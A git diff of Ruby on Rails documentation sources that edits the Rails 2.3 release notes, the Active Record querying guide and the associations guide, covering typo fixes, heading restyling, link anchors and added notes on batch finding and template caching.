Diffstat (limited to 'railties/guides/source')
-rw-r--r--  railties/guides/source/2_3_release_notes.textile          27
-rw-r--r--  railties/guides/source/active_record_querying.textile      4
-rw-r--r--  railties/guides/source/association_basics.textile        381
-rw-r--r--  railties/guides/source/caching_with_rails.textile         17
-rw-r--r--  railties/guides/source/index.erb.textile                   8
-rw-r--r--  railties/guides/source/layouts_and_rendering.textile       8
-rw-r--r--  railties/guides/source/security.textile                  150
7 files changed, 310 insertions, 285 deletions
diff --git a/railties/guides/source/2_3_release_notes.textile b/railties/guides/source/2_3_release_notes.textile index 4734e32606..c58cbc0b81 100644 --- a/railties/guides/source/2_3_release_notes.textile +++ b/railties/guides/source/2_3_release_notes.textile @@ -1,5 +1,7 @@ h2. Ruby on Rails 2.3 Release Notes +NOTE: These release notes refer to RC2 of Rails 2.3. This is a release candidate, and not the final version of Rails 2.3. It's intended to be a stable testing release, and we urge you to test your own applications and report any issues to the "Rails Lighthouse":http://rails.lighthouseapp.com/projects/8994-ruby-on-rails/overview. + Rails 2.3 delivers a variety of new and improved features, including pervasive Rack integration, refreshed support for Rails Engines, nested transactions for Active Record, dynamic and default scopes, unified rendering, more efficient routing, application templates, and quiet backtraces. This list covers the major upgrades, but doesn't include every little bug fix and change. If you want to see everything, check out the "list of commits":http://github.com/rails/rails/commits/master in the main Rails repository on GitHub or review the +CHANGELOG+ files for the individual Rails components. endprologue. 
@@ -136,7 +138,7 @@ Customer.find_in_batches(:conditions => {:active => true}) do |customer_group| end </ruby> -You can pass most of the +find+ options into +find_in_batches+. However, you cannot specify the order that records will be returned in (they will always be returned in ascending order of primary key, which must be an integer), or use the +:limit+ option. Instead, use the +:batch_size: option, which defaults to 1000, to set the number of records that will be returned in each batch. +You can pass most of the +find+ options into +find_in_batches+. However, you cannot specify the order that records will be returned in (they will always be returned in ascending order of primary key, which must be an integer), or use the +:limit+ option. Instead, use the +:batch_size+ option, which defaults to 1000, to set the number of records that will be returned in each batch. The new +each+ method provides a wrapper around +find_in_batches+ that returns individual records, with the find itself being done in batches (of 1000 by default): @@ -146,7 +148,11 @@ Customer.each do |customer| end </ruby> -Note that you should only use this record for batch processing: for small numbers of records (less than 1000), you should just use the regular find methods with your own loop. +Note that you should only use this method for batch processing: for small numbers of records (less than 1000), you should just use the regular find methods with your own loop. + +* More Information: + - "Rails 2.3: Batch Finding":http://afreshcup.com/2009/02/23/rails-23-batch-finding/ + - "What's New in Edge Rails: Batched Find":http://ryandaigle.com/articles/2009/2/23/what-s-new-in-edge-rails-batched-find h4. Multiple Conditions for Callbacks 
@@ -313,6 +319,8 @@ h4. Other Action Controller Changes * Cookie sessions now have persistent session identifiers, with API compatibility with the server-side stores. * You can now use symbols for the +:type+ option of +send_file+ and +send_data+, like this: +send_file("fabulous.png", :type => :png)+. * The +:only+ and +:except+ options for +map.resources+ are no longer inherited by nested resources. +* The bundled memcached client has been updated to version 1.6.4.99. +* The +expires_in+, +stale?+, and +fresh_when+ methods now accept a +:public+ option to make them work well with proxy caching. h3. Action View @@ -431,6 +439,18 @@ returns </optgroup> </ruby> +h4. A Note About Template Loading + +Rails 2.3 includes the ability to enable or disable cached templates for any particular environment. Cached templates give you a speed boost because they don't check for a new template file when they're rendered - but they also mean that you can't replace a template "on the fly" without restarting the server. + +In most cases, you'll want template caching to be turned on in production, which you can do by making a setting in your +production.rb+ file: + +<ruby> +config.action_view.cache_template_loading = true +</ruby> + +This line will be generated for you by default in a new Rails 2.3 application. If you've upgraded from an older version of Rails, Rails will default to caching templates in production and test but not in development. + h4. Other Action View Changes * Token generation for CSRF protection has been simplified; now Rails uses a simple random string generated by +ActiveSupport::SecureRandom+ rather than mucking around with session IDs. 
@@ -481,7 +501,7 @@ In addition to the Rack changes covered above, Railties (the core code of Rails h4. Rails Metal -Rails Metal is a new mechanism that provides superfast endpoints inside of your Rails applications. Metal classes bypass routing and Action Controller to give you raw speed (at the cost of all the things in Action Controller, of course). This builds on all of the recent foundation work to make Rails a Rack application with an exposed middleware stack. +Rails Metal is a new mechanism that provides superfast endpoints inside of your Rails applications. Metal classes bypass routing and Action Controller to give you raw speed (at the cost of all the things in Action Controller, of course). This builds on all of the recent foundation work to make Rails a Rack application with an exposed middleware stack. Metal endpoints can be loaded from your application or from plugins. * More Information: ** "Introducing Rails Metal":http://weblog.rubyonrails.org/2008/12/17/introducing-rails-metal @@ -538,6 +558,7 @@ A few pieces of older code are deprecated in this release: * +formatted_polymorphic_url+ is deprecated. Use +polymorphic_url+ with +:format+ instead. * The +:http_only+ option in +ActionController::Response#set_cookie+ has been renamed to +:httponly+. * The +:connector+ and +:skip_last_comma+ options of +to_sentence+ have been replaced by +:words_connnector+, +:two_words_connector+, and +:last_word_connector+ options. +* Posting a multipart form with an empty +file_field+ control used to submit an empty string to the controller. Now it submits a nil, due to differences between Rack's multipart parser and the old Rails one. h3. Credits diff --git a/railties/guides/source/active_record_querying.textile b/railties/guides/source/active_record_querying.textile index 5da15bbb5c..03e1b264b2 100644 --- a/railties/guides/source/active_record_querying.textile +++ b/railties/guides/source/active_record_querying.textile 
@@ -314,7 +314,7 @@ This will find all clients created yesterday by using a +BETWEEN+ SQL statement: SELECT * FROM clients WHERE (clients.created_at BETWEEN '2008-12-21 00:00:00' AND '2008-12-22 00:00:00') </sql> -This demonstrates a shorter syntax for the examples in "Array Conditions":#array-conditions +This demonstrates a shorter syntax for the examples in "Array Conditions":#arrayconditions h5. Subset conditions @@ -376,7 +376,7 @@ By default, <tt>Model.find</tt> selects all the fields from the result set using To select only a subset of fields from the result set, you can specify the subset via +:select+ option on the +find+. -NOTE: If the +:select+ option is used, all the returning objects will be "read only":#read-only objects. +NOTE: If the +:select+ option is used, all the returning objects will be "read only":#readonlyobjects. <br /> diff --git a/railties/guides/source/association_basics.textile b/railties/guides/source/association_basics.textile index e82f32d35e..3c03c825cd 100644 --- a/railties/guides/source/association_basics.textile +++ b/railties/guides/source/association_basics.textile @@ -37,7 +37,7 @@ end @customer.destroy </ruby> -With Active Record associations, we can streamline these - and other - operations by declaratively telling Rails that there is a connection between the two models. Here's the revised code for setting up customers and orders: +With Active Record associations, we can streamline these -- and other -- operations by declaratively telling Rails that there is a connection between the two models. Here's the revised code for setting up customers and orders: <ruby> class Customer < ActiveRecord::Base 
@@ -61,7 +61,7 @@ Deleting a customer and all of its orders is _much_ easier: @customer.destroy </ruby> -To learn more about the different types of associations, read the next section of this Guide. That's followed by some tips and tricks for working with associations, and then by a complete reference to the methods and options for associations in Rails. +To learn more about the different types of associations, read the next section of this guide. That's followed by some tips and tricks for working with associations, and then by a complete reference to the methods and options for associations in Rails. h3. The Types of Associations @@ -76,7 +76,7 @@ In Rails, an _association_ is a connection between two Active Record models. Ass In the remainder of this guide, you'll learn how to declare and use the various forms of associations. But first, a quick introduction to the situations where each association type is appropriate. -h4. The belongs_to Association +h4. The +belongs_to+ association A +belongs_to+ association sets up a one-to-one connection with another model, such that each instance of the declaring model "belongs to" one instance of the other model. For example, if your application includes customers and orders, and each order can be assigned to exactly one customer, you'd declare the order model this way: @@ -88,7 +88,7 @@ end !images/belongs_to.png(belongs_to Association Diagram)! -h4. The has_one Association +h4. The +has_one+ association A +has_one+ association also sets up a one-to-one connection with another model, but with somewhat different semantics (and consequences). This association indicates that each instance of a model contains or possesses one instance of another model. For example, if each supplier in your application has only one account, you'd declare the supplier model like this: 
@@ -100,7 +100,7 @@ end !images/has_one.png(has_one Association Diagram)! -h4. The has_many Association +h4. The +has_many+ association A +has_many+ association indicates a one-to-many connection with another model. You'll often find this association on the "other side" of a +belongs_to+ association. This association indicates that each instance of the model has zero or more instances of another model. For example, in an application containing customers and orders, the customer model could be declared like this: @@ -114,7 +114,7 @@ NOTE: The name of the other model is pluralized when declaring a +has_many+ asso !images/has_many.png(has_many Association Diagram)! -h4. The has_many :through Association +h4. The +has_many :through+ association A +has_many :through+ association is often used to set up a many-to-many connection with another model. This association indicates that the declaring model can be matched with zero or more instances of another model by proceeding _through_ a third model. For example, consider a medical practice where patients make appointments to see physicians. The relevant association declarations could look like this: @@ -155,7 +155,7 @@ class Paragraph < ActiveRecord::Base end </ruby> -h4. The has_one :through Association +h4. The +has_one :through+ association A +has_one :through+ association sets up a one-to-one connection with another model. This association indicates that the declaring model can be matched with one instance of another model by proceeding _through_ a third model. For example, if each supplier has one account, and each account is associated with one account history, then the customer model could look like this: 
@@ -177,7 +177,7 @@ end !images/has_one_through.png(has_one :through Association Diagram)! -h4. The has_and_belongs_to_many Association +h4. The +has_and_belongs_to_many+ association A +has_and_belongs_to_many+ association creates a direct many-to-many connection with another model, with no intervening model. For example, if your application includes assemblies and parts, with each assembly having many parts and each part appearing in many assemblies, you could declare the models this way: @@ -193,7 +193,7 @@ end !images/habtm.png(has_and_belongs_to_many Association Diagram)! -h4. Choosing Between belongs_to and has_one +h4. Choosing between +belongs_to+ and +has_one+ If you want to set up a 1–1 relationship between two models, you'll need to add +belongs_to+ to one, and +has_one+ to the other. How do you know which is which? @@ -235,7 +235,7 @@ end NOTE: Using +t.integer :supplier_id+ makes the foreign key naming obvious and explicit. In current versions of Rails, you can abstract away this implementation detail by using +t.references :supplier+ instead. -h4. Choosing Between has_many :through and has_and_belongs_to_many +h4. Choosing between +has_many :through+ and +has_and_belongs_to_many+ Rails offers two different ways to declare a many-to-many relationship between models. The simpler way is to use +has_and_belongs_to_many+, which allows you to make the association directly: @@ -272,7 +272,7 @@ The simplest rule of thumb is that you should set up a +has_many :through+ relat You should use +has_many :through+ if you need validations, callbacks, or extra attributes on the join model. -h4. Polymorphic Associations +h4. Polymorphic associations A slightly more advanced twist on associations is the _polymorphic association_. With polymorphic associations, a model can belong to more than one other model, on a single association. For example, you might have a picture model that belongs to either an employee model or a product model. Here's how this could be declared: 
@@ -319,7 +319,7 @@ This migration can be simplified by using the +t.references+ form: class CreatePictures < ActiveRecord::Migration def self.up create_table :pictures do |t| - t.string :name + t.string :name t.references :imageable, :polymorphic => true t.timestamps end @@ -333,7 +333,7 @@ end !images/polymorphic.png(Polymorphic Association Diagram)! -h4. Self Joins +h4. Self joins In designing a data model, you will sometimes find a model that should have a relation to itself. For example, you may want to store all employees in a single database model, but be able to trace relationships such as between manager and subordinates. This situation can be modeled with self-joining associations: @@ -356,7 +356,7 @@ Here are a few things you should know to make efficient use of Active Record ass * Updating the schema * Controlling association scope -h4. Controlling Caching +h4. Controlling caching All of the association methods are built around caching, which keeps the result of the most recent query available for further operations. The cache is even shared across methods. For example: 
@@ -375,15 +375,15 @@ customer.orders(true).empty? # discards the cached copy of orders # and goes back to the database </ruby> -h4. Avoiding Name Collisions +h4. Avoiding name collisions You are not free to use just any name for your associations. Because creating an association adds a method with that name to the model, it is a bad idea to give an association a name that is already used for an instance method of +ActiveRecord::Base+. The association method would override the base method and break things. For instance, +attributes+ or +connection+ are bad names for associations. -h4. Updating the Schema +h4. Updating the schema Associations are extremely useful, but they are not magic. You are responsible for maintaining your database schema to match your associations. In practice, this means two things, depending on what sort of associations you are creating. For +belongs_to+ associations you need to create foreign keys, and for +has_and_belongs_to_many+ associations you need to create the appropriate join table. -h5. Creating Foreign Keys for belongs_to Associations +h5. Creating foreign Keys for +belongs_to+ associations When you declare a +belongs_to+ association, you need to create foreign keys as appropriate. For example, consider this model: @@ -399,9 +399,9 @@ This declaration needs to be backed up by the proper foreign key declaration on class CreateOrders < ActiveRecord::Migration def self.up create_table :orders do |t| - t.datetime :order_date - t.string :order_number - t.integer :customer_id + t.datetime :order_date + t.string :order_number + t.integer :customer_id end end 
@@ -413,7 +413,7 @@ end If you create an association some time after you build the underlying model, you need to remember to create an +add_column+ migration to provide the necessary foreign key. -h5. Creating Join Tables for has_and_belongs_to_many Associations +h5. Creating join tables for +has_and_belongs_to_many+ associations If you create a +has_and_belongs_to_many+ association, you need to explicitly create the joining table. Unless the name of the join table is explicitly specified by using the +:join_table+ option, Active Record creates the name by using the lexical order of the class names. So a join between customer and order models will give the default join table name of "customers_orders" because "c" outranks "o" in lexical ordering. @@ -448,7 +448,9 @@ class CreateAssemblyPartJoinTable < ActiveRecord::Migration end </ruby> -h4. Controlling Association Scope +We pass +:id => false+ to +create_table+ because that table does not represent a model. That's required for the association to work properly. If you observe any strange behaviour in a +has_and_belongs_to_many+ association like mangled models IDs, or exceptions about conflicting IDs chances are you forgot that bit. + +h4. Controlling association scope By default, associations look for objects only within the current module's scope. This can be important when you declare Active Record models within a module. For example: @@ -484,7 +486,7 @@ module MyApplication end </ruby> -To associate a model with a model in a different scope, you must specify the complete class name in your association declaration: +To associate a model with a model in a different namespace, you must specify the complete class name in your association declaration: <ruby> module MyApplication 
@@ -508,17 +510,16 @@ h3. Detailed Association Reference The following sections give the details of each type of association, including the methods that they add and the options that you can use when declaring an association. -h4. belongs_to Association Reference +h4. +belongs_to+ association reference The +belongs_to+ association creates a one-to-one match with another model. In database terms, this association says that this class contains the foreign key. If the other class contains the foreign key, then you should use +has_one+ instead. -h5. Methods Added by belongs_to +h5. Methods added by +belongs_to+ -When you declare a +belongs_to+ association, the declaring class automatically gains five methods related to the association: +When you declare a +belongs_to+ association, the declaring class automatically gains four methods related to the association: * <tt><em>association</em>(force_reload = false)</tt> * <tt><em>association</em>=(associate)</tt> -* <tt><em>association</em>.nil?</tt> * <tt>build_<em>association</em>(attributes = {})</tt> * <tt>create_<em>association</em>(attributes = {})</tt> @@ -535,7 +536,6 @@ Each instance of the order model will have these methods: <ruby> customer customer= -customer.nil? build_customer create_customer </ruby> 
@@ -558,23 +558,13 @@ The <tt><em>association</em>=</tt> method assigns an associated object to this o @order.customer = @customer </ruby> -h6. _association_.nil? - -The <tt><em>association</em>.nil?</tt> method returns +true+ if there is no associated object. - -<ruby> -if @order.customer.nil? - @msg = "No customer found for this order" -end -</ruby> - h6. build_<em>association</em>(attributes = {}) The <tt>build_<em>association</em></tt> method returns a new object of the associated type. This object will be instantiated from the passed attributes, and the link through this object's foreign key will be set, but the associated object will _not_ yet be saved. <ruby> -@customer = @order.build_customer({:customer_number => 123, - :customer_name => "John Doe"}) +@customer = @order.build_customer(:customer_number => 123, + :customer_name => "John Doe") </ruby> h6. create_<em>association</em>(attributes = {}) @@ -582,11 +572,12 @@ h6. create_<em>association</em>(attributes = {}) The <tt>create_<em>association</em></tt> method returns a new object of the associated type. This object will be instantiated from the passed attributes, and the link through this object's foreign key will be set. In addition, the associated object _will_ be saved (assuming that it passes any validations). <ruby> -@customer = @order.create_customer({:customer_number => 123, - :customer_name => "John Doe"}) +@customer = @order.create_customer(:customer_number => 123, + :customer_name => "John Doe") </ruby> -h5. Options for belongs_to + +h5. Options for +belongs_to+ In many situations, you can use the default behavior of +belongs_to+ without any customization. But despite Rails' emphasis of convention over customization, you can alter that behavior in a number of ways. This section covers the options that you can pass when you create a +belongs_to+ association. For example, an association with several options might look like this: 
@@ -611,11 +602,11 @@ The +belongs_to+ association supports these options: * +:select+ * +:validate+ -h6. :autosave +h6. +:autosave+ If you set the +:autosave+ option to +true+, Rails will save any loaded members and destroy members that are marked for destruction whenever you save the parent object. -h6. :class_name +h6. +:class_name+ If the name of the other model cannot be derived from the association name, you can use the +:class_name+ option to supply the model name. For example, if an order belongs to a customer, but the actual name of the model containing customers is +Patron+, you'd set things up this way: @@ -625,7 +616,7 @@ class Order < ActiveRecord::Base end </ruby> -h6. :conditions +h6. +:conditions+ The +:conditions+ option lets you specify the conditions that the associated object must meet (in the syntax used by a SQL +WHERE+ clause). @@ -635,7 +626,7 @@ class Order < ActiveRecord::Base end </ruby> -h6. :counter_cache +h6. +:counter_cache+ The +:counter_cache+ option can be used to make finding the number of belonging objects more efficient. Consider these models: @@ -659,7 +650,7 @@ class Customer < ActiveRecord::Base end </ruby> -With this declaration, Rails will keep the cache value up to date, and then return that value in response to the +.size+ method. +With this declaration, Rails will keep the cache value up to date, and then return that value in response to the +size+ method. Although the +:counter_cache+ option is specified on the model that includes the +belongs_to+ declaration, the actual column must be added to the _associated_ model. In the case above, you would need to add a column named +orders_count+ to the +Customer+ model. You can override the default column name if you need to: 
@@ -674,13 +665,13 @@ end Counter cache columns are added to the containing model's list of read-only attributes through +attr_readonly+. -h6. :dependent +h6. +:dependent+ -If you set the +:dependent+ option to +:destroy+, then deleting this object will call the destroy method on the associated object to delete that object. If you set the +:dependent+ option to +:delete+, then deleting this object will delete the associated object _without_ calling its +destroy+ method. +If you set the +:dependent+ option to +:destroy+, then deleting this object will call the +destroy+ method on the associated object to delete that object. If you set the +:dependent+ option to +:delete+, then deleting this object will delete the associated object _without_ calling its +destroy+ method. WARNING: You should not specify this option on a +belongs_to+ association that is connected with a +has_many+ association on the other class. Doing so can lead to orphaned records in your database. -h6. :foreign_key +h6. +:foreign_key+ By convention, Rails guesses that the column used to hold the foreign key on this model is the name of the association with the suffix +_id+ added. The +:foreign_key+ option lets you set the name of the foreign key directly: @@ -693,7 +684,7 @@ end TIP: In any case, Rails will not create foreign key columns for you. You need to explicitly define them as part of your migrations. -h6. :include +h6. +:include+ You can use the +:include+ option to specify second-order associations that should be eager-loaded when this association is used. For example, consider these models: 
@@ -731,39 +722,48 @@ end NOTE: There's no need to use +:include+ for immediate associations - that is, if you have +Order belongs_to :customer+, then the customer is eager-loaded automatically when it's needed. -h6. :polymorphic +h6. +:polymorphic+ -Passing +true+ to the +:polymorphic+ option indicates that this is a polymorphic association. Polymorphic associations were discussed in detail <a href="#polymorphic-associations">earlier in this guide</a>. +Passing +true+ to the +:polymorphic+ option indicates that this is a polymorphic association. Polymorphic associations were discussed in detail <a href="#polymorphicassociations">earlier in this guide</a>. -h6. :readonly +h6. +:readonly+ If you set the +:readonly+ option to +true+, then the associated object will be read-only when retrieved via the association. -h6. :select +h6. +:select+ The +:select+ option lets you override the SQL +SELECT+ clause that is used to retrieve data about the associated object. By default, Rails retrieves all columns. TIP: If you set the +:select+ option on a +belongs_to+ association, you should also set the +foreign_key+ option to guarantee the correct results. -h6. :validate +h6. +:validate+ If you set the +:validate+ option to +true+, then associated objects will be validated whenever you save this object. By default, this is +false+: associated objects will not be validated when this object is saved. -h5. When are Objects Saved? +h5. How to know whether there's an associated object? + +To know whether there's and associated object just check <tt><em>association</em>.nil?</tt>: + +<ruby> +if @order.customer.nil? + @msg = "No customer found for this order" +end +</ruby> + +h5. When are objects saved? Assigning an object to a +belongs_to+ association does _not_ automatically save the object. It does not save the associated object either. -h4. has_one Association Reference +h4. +has_one+ association reference The +has_one+ association creates a one-to-one match with another model. 
In database terms, this association says that the other class contains the foreign key. If this class contains the foreign key, then you should use +belongs_to+ instead. -h5. Methods Added by has_one +h5. Methods added by +has_one+ -When you declare a +has_one+ association, the declaring class automatically gains five methods related to the association: +When you declare a +has_one+ association, the declaring class automatically gains four methods related to the association: * <tt><em>association</em>(force_reload = false)</tt> * <tt><em>association</em>=(associate)</tt> -* <tt><em>association</em>.nil?</tt> * <tt>build_<em>association</em>(attributes = {})</tt> * <tt>create_<em>association</em>(attributes = {})</tt> @@ -780,12 +780,11 @@ Each instance of the +Supplier+ model will have these methods: <ruby> account account= -account.nil? build_account create_account </ruby> -h6. <em>association</em>(force_reload = false) +h6. <tt><em>association</em>(force_reload = false)</tt> The <tt><em>association</em></tt> method returns the associated object, if any. If no associated object is found, it returns +nil+. @@ -795,7 +794,7 @@ The <tt><em>association</em></tt> method returns the associated object, if any. If the associated object has already been retrieved from the database for this object, the cached version will be returned. To override this behavior (and force a database read), pass +true+ as the +force_reload+ argument. -h6. <em>association</em>=(associate) +h6. <tt><em>association</em>=(associate)</tt> The <tt><em>association</em>=</tt> method assigns an associated object to this object. Behind the scenes, this means extracting the primary key from this object and setting the associate object's foreign key to the same value. 
@@ -803,33 +802,23 @@ The <tt><em>association</em>=</tt> method assigns an associated object to this o @supplier.account = @account </ruby> -h6. <em>association</em>.nil? - -The <tt><em>association</em>.nil?</tt> method returns +true+ if there is no associated object. - -<ruby> -if @supplier.account.nil? - @msg = "No account found for this supplier" -end -</ruby> - -h6. build_<em>association</em>(attributes = {}) +h6. <tt>build_<em>association</em>(attributes = {})</tt> The <tt>build_<em>association</em></tt> method returns a new object of the associated type. This object will be instantiated from the passed attributes, and the link through its foreign key will be set, but the associated object will _not_ yet be saved. <ruby> -@account = @supplier.build_account({:terms => "Net 30"}) +@account = @supplier.build_account(:terms => "Net 30") </ruby> -h6. create_<em>association</em>(attributes = {}) +h6. <tt>create_<em>association</em>(attributes = {})</tt> The <tt>create_<em>association</em></tt> method returns a new object of the associated type. This object will be instantiated from the passed attributes, and the link through its foreign key will be set. In addition, the associated object _will_ be saved (assuming that it passes any validations). <ruby> -@account = @supplier.create_account({:terms => "Net 30"}) +@account = @supplier.create_account(:terms => "Net 30") </ruby> -h5. Options for has_one +h5. Options for +has_one+ In many situations, you can use the default behavior of +has_one+ without any customization. But despite Rails' emphasis of convention over customization, you can alter that behavior in a number of ways. This section covers the options that you can pass when you create a +has_one+ association. For example, an association with several options might look like this: 
@@ -857,17 +846,17 @@ The +has_one+ association supports these options: * +:through+ * +:validate+ -h6. :as +h6. +:as+ -Setting the +:as+ option indicates that this is a polymorphic association. Polymorphic associations were discussed in detail <a href="#polymorphic-associations">earlier in this guide</a>. +Setting the +:as+ option indicates that this is a polymorphic association. Polymorphic associations were discussed in detail <a href="#polymorphicassociations">earlier in this guide</a>. -h6. :autosave +h6. +:autosave+ If you set the +:autosave+ option to +true+, Rails will save any loaded members and destroy members that are marked for destruction whenever you save the parent object. -h6. :class_name +h6. +:class_name+ -If the name of the other model cannot be derived from the association name, you can use the +:class_name+ option to supply the model name. For example, if a supplier has an account, but the actual name of the model containing accounts is Billing, you'd set things up this way: +If the name of the other model cannot be derived from the association name, you can use the +:class_name+ option to supply the model name. For example, if a supplier has an account, but the actual name of the model containing accounts is +Billing+, you'd set things up this way: <ruby> class Supplier < ActiveRecord::Base @@ -875,7 +864,7 @@ class Supplier < ActiveRecord::Base end </ruby> -h6. :conditions +h6. +:conditions+ The +:conditions+ option lets you specify the conditions that the associated object must meet (in the syntax used by a SQL +WHERE+ clause). 
@@ -885,11 +874,11 @@ class Supplier < ActiveRecord::Base end </ruby> -h6. :dependent +h6. +:dependent+ -If you set the +:dependent+ option to +:destroy+, then deleting this object will call the destroy method on the associated object to delete that object. If you set the +:dependent+ option to +:delete+, then deleting this object will delete the associated object _without_ calling its +destroy+ method. If you set the +:dependent+ option to +:nullify+, then deleting this object will set the foreign key in the association object to +NULL+. +If you set the +:dependent+ option to +:destroy+, then deleting this object will call the +destroy+ method on the associated object to delete that object. If you set the +:dependent+ option to +:delete+, then deleting this object will delete the associated object _without_ calling its +destroy+ method. If you set the +:dependent+ option to +:nullify+, then deleting this object will set the foreign key in the association object to +NULL+. -h6. :foreign_key +h6. +:foreign_key+ By convention, Rails guesses that the column used to hold the foreign key on the other model is the name of this model with the suffix +_id+ added. The +:foreign_key+ option lets you set the name of the foreign key directly: @@ -901,7 +890,7 @@ end TIP: In any case, Rails will not create foreign key columns for you. You need to explicitly define them as part of your migrations. -h6. :include +h6. +:include+ You can use the +:include+ option to specify second-order associations that should be eager-loaded when this association is used. For example, consider these models: 
@@ -937,53 +926,63 @@ class Representative < ActiveRecord::Base end </ruby> -h6. :order +h6. +:order+ The +:order+ option dictates the order in which associated objects will be received (in the syntax used by a SQL +ORDER BY+ clause). Because a +has_one+ association will only retrieve a single associated object, this option should not be needed. -h6. :primary_key +h6. +:primary_key+ By convention, Rails guesses that the column used to hold the primary key of this model is +id+. You can override this and explicitly specify the primary key with the +:primary_key+ option. -h6. :readonly +h6. +:readonly+ If you set the +:readonly+ option to +true+, then the associated object will be read-only when retrieved via the association. -h6. :select +h6. +:select+ The +:select+ option lets you override the SQL +SELECT+ clause that is used to retrieve data about the associated object. By default, Rails retrieves all columns. -h6. :source +h6. +:source+ The +:source+ option specifies the source association name for a +has_one :through+ association. -h6. :source_type +h6. +:source_type+ The +:source_type+ option specifies the source association type for a +has_one :through+ association that proceeds through a polymorphic association. h6. :through -The +:through+ option specifies a join model through which to perform the query. +has_one :through+ associations were discussed in detail <a href="#thehas-onethrough-association">earlier in this guide</a>. +The +:through+ option specifies a join model through which to perform the query. +has_one :through+ associations were discussed in detail <a href="#thehas-onethroughassociation">earlier in this guide</a>. -h6. :validate +h6. +:validate+ If you set the +:validate+ option to +true+, then associated objects will be validated whenever you save this object. By default, this is +false+: associated objects will not be validated when this object is saved. -h5. When are Objects Saved? +h5. How to know whether there's an associated object? 
+ +To know whether there's and associated object just check <tt><em>association</em>.nil?</tt>: + +<ruby> +if @supplier.account.nil? + @msg = "No account found for this supplier" +end +</ruby> + +h5. When are objects saved? When you assign an object to a +has_one+ association, that object is automatically saved (in order to update its foreign key). In addition, any object being replaced is also automatically saved, because its foreign key will change too. If either of these saves fails due to validation errors, then the assignment statement returns +false+ and the assignment itself is cancelled. -If the parent object (the one declaring the +has_one+ association) is unsaved (that is, +new_record?+ returns +true+) then the child objects are not saved. +If the parent object (the one declaring the +has_one+ association) is unsaved (that is, +new_record?+ returns +true+) then the child objects are not saved. They will automatically when the parent object is saved. If you want to assign an object to a +has_one+ association without saving the object, use the <tt><em>association</em>.build</tt> method. -h4. has_many Association Reference +h4. +has_many+ association reference The +has_many+ association creates a one-to-many relationship with another model. In database terms, this association says that the other class will have a foreign key that refers to instances of this class. -h5. Methods Added +h5. Methods added When you declare a +has_many+ association, the declaring class automatically gains 13 methods related to the association: @@ -1027,7 +1026,7 @@ orders.build(attributes = {}, ...) orders.create(attributes = {}) </ruby> -h6. <em>collection</em>(force_reload = false) +h6. <tt><em>collection</em>(force_reload = false)</tt> The <tt><em>collection</em></tt> method returns an array of all of the associated objects. If there are no associated objects, it returns an empty array. 
@@ -1035,7 +1034,7 @@ The <tt><em>collection</em></tt> method returns an array of all of the associate @orders = @customer.orders </ruby> -h6. <em>collection</em><<(object, ...) +h6. <tt><em>collection</em><<(object, ...)</tt> The <tt><em>collection</em><<</tt> method adds one or more objects to the collection by setting their foreign keys to the primary key of the calling model. @@ -1043,7 +1042,7 @@ The <tt><em>collection</em><<</tt> method adds one or more objects to the collec @customer.orders << @order1 </ruby> -h6. <em>collection</em>.delete(object, ...) +h6. <tt><em>collection</em>.delete(object, ...)</tt> The <tt><em>collection</em>.delete</tt> method removes one or more objects from the collection by setting their foreign keys to +NULL+. @@ -1054,11 +1053,11 @@ The <tt><em>collection</em>.delete</tt> method removes one or more objects from WARNING: Objects will be in addition destroyed if they're associated with +:dependent => :destroy+, and deleted if they're associated with +:dependent => :delete_all+. -h6. <em>collection</em>=objects +h6. <tt><em>collection</em>=objects</tt> The <tt><em>collection</em>=</tt> method makes the collection contain only the supplied objects, by adding and deleting as appropriate. -h6. <em>collection_singular</em>_ids +h6. <tt><em>collection_singular</em>_ids</tt> The <tt><em>collection_singular</em>_ids</tt> method returns an array of the ids of the objects in the collection. 
@@ -1066,15 +1065,15 @@ The <tt><em>collection_singular</em>_ids</tt> method returns an array of the ids @order_ids = @customer.order_ids </ruby> -h6. <em>collection_singular</em>_ids=ids +h6. <tt><em>collection_singular</em>_ids=ids</tt> The <tt><em>collection_singular</em>_ids=</tt> method makes the collection contain only the objects identified by the supplied primary key values, by adding and deleting as appropriate. -h6. <em>collection</em>.clear +h6. <tt><em>collection</em>.clear</tt> The <tt><em>collection</em>.clear</tt> method removes every object from the collection. This destroys the associated objects if they are associated with +:dependent => :destroy+, deletes them directly from the database if +:dependent => :delete_all+, and otherwise sets their foreign keys to +NULL+. -h6. <em>collection</em>.empty? +h6. <tt><em>collection</em>.empty?</tt> The <tt><em>collection</em>.empty?</tt> method returns +true+ if the collection does not contain any associated objects. @@ -1084,7 +1083,7 @@ The <tt><em>collection</em>.empty?</tt> method returns +true+ if the collection <% end %> </ruby> -h6. <em>collection</em>.size +h6. <tt><em>collection</em>.size</tt> The <tt><em>collection</em>.size</tt> method returns the number of objects in the collection. @@ -1092,7 +1091,7 @@ The <tt><em>collection</em>.size</tt> method returns the number of objects in th @order_count = @customer.orders.size </ruby> -h6. <em>collection</em>.find(...) +h6. <tt><em>collection</em>.find(...)</tt> The <tt><em>collection</em>.find</tt> method finds objects within the collection. It uses the same syntax and options as +ActiveRecord::Base.find+. 
@@ -1100,29 +1099,29 @@ The <tt><em>collection</em>.find</tt> method finds objects within the collection @open_orders = @customer.orders.find(:all, :conditions => "open = 1") </ruby> -h6. <em>collection</em>.exist?(...) +h6. <tt><em>collection</em>.exist?(...)</tt> The <tt><em>collection</em>.exist?</tt> method checks whether an object meeting the supplied conditions exists in the collection. It uses the same syntax and options as +ActiveRecord::Base.exists?+. -h6. <em>collection</em>.build(attributes = {}, ...) +h6. <tt><em>collection</em>.build(attributes = {}, ...)</tt> The <tt><em>collection</em>.build</tt> method returns one or more new objects of the associated type. These objects will be instantiated from the passed attributes, and the link through their foreign key will be created, but the associated objects will _not_ yet be saved. <ruby> -@order = @customer.orders.build({:order_date => Time.now, - :order_number => "A12345"}) +@order = @customer.orders.build(:order_date => Time.now, + :order_number => "A12345") </ruby> -h6. <em>collection</em>.create(attributes = {}) +h6. <tt><em>collection</em>.create(attributes = {})</tt> The <tt><em>collection</em>.create</tt> method returns a new object of the associated type. This object will be instantiated from the passed attributes, the link through its foreign key will be created, and the associated object _will_ be saved (assuming that it passes any validations). <ruby> -@order = @customer.orders.create({:order_date => Time.now, - :order_number => "A12345"}) +@order = @customer.orders.create(:order_date => Time.now, + :order_number => "A12345") </ruby> -h5. Options for has_many +h5. Options for +has_many+ In many situations, you can use the default behavior for +has_many+ without any customization. But you can alter that behavior in a number of ways. This section covers the options that you can pass when you create a +has_many+ association. For example, an association with several options might look like this: 
